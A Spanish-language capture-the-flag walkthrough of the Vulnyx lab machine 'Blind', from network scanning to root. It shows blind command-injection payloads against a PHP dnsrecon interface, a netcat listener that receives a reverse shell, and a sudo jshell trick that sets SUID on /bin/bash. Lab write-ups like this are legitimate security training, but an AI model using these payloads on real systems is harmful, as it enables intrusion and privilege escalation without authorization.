Máquina Blind (Vulnyx)
Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
$ netdiscover -i eth1 -r 10.0.2.0/24
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Victima: 10.0.2.65
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:
$ ping -c 1 10.0.2.65
Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux.
A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:
$ nmap -Pn -p- 10.0.2.65 -sVC
Como podemos comprobar la Máquina Victima tiene abierto el puerto 80.
Comprobamos que es lo que corre por el puerto 80.
En el escaneo de los servicios con la herramienta nmap encontramos el fichero robots.txt, Este fichero se incluye en la raíz de cada dominio para evitar que los motores de búsqueda indexen contenido de las rutas indicadas, encontramos el directorio dnsrecon-gui.
Accedemos a el.
Nos encontramos con dnsrecon con una interfaz gráfica implementada en PHP.
Probamos en el input un Command Injection, para ello introducimos en el, lo siguiente:
;whoami
No obtenemos la salida del comando whoami, pero aun así no podemos descartar de que sea vulnerable, ya que podríamos estar ante un tipo blind, por lo tanto, inyectamos lo siguiente:
; `sleep 5`
La respuesta de la pagina web tarda más de 5 segundos, por lo tanto, siendo vulnerable a Command Injection.
A continuación, en la terminal de nuestra Máquina Atacante y con la ayuda de la herramienta de netcat(nc) nos ponemos a la escucha por el puerto 443 por donde vamos a recibir la conexión, para ello ejecutamos el siguiente comando:
$ nc -lvnp 443
Ejecutamos la siguiente reverse shell en busybox de la siguente manera:
Y obtenemos una shell como microjoan.
A continuación, hacemos un tratamiento de la TTY para obtener una shell interactiva y así evitar problemas, para ello ejecutamos los siguientes comandos:
$ script /dev/null -c bash
Ctrl + Z
$ stty raw -echo;fg
$ reset xterm
$ export TERM=xterm
Visualizamos el fichero index.php dentro del directorio /var/www/html/dnsrecon-gui, para ello ejecutamos el siguiente comando:
$ cat index.php
Enumeramos lo permisos sudo, para ello ejecutamos el siguiente comando:
$ sudo -l
Nos encontramos con el binario jshell que lo podemos ejecutar como el usuario root, por lo tanto nos vamos a la pagina gtfobins a mirar el payload.
Lo ejecutamos de la siguiente manera:
$ sudo -u root /usr/bin/jshell
jshell> Runtime.getRuntime().exec(“chmod 4755 /bin/bash”);
jshell> /exit
Ejecutamos el binario bash con la opción -pi para que preserve los privilegios efectivos y una shell interactiva, para ello ejecutamos el siguiente comando:
$ /bin/bash -pi











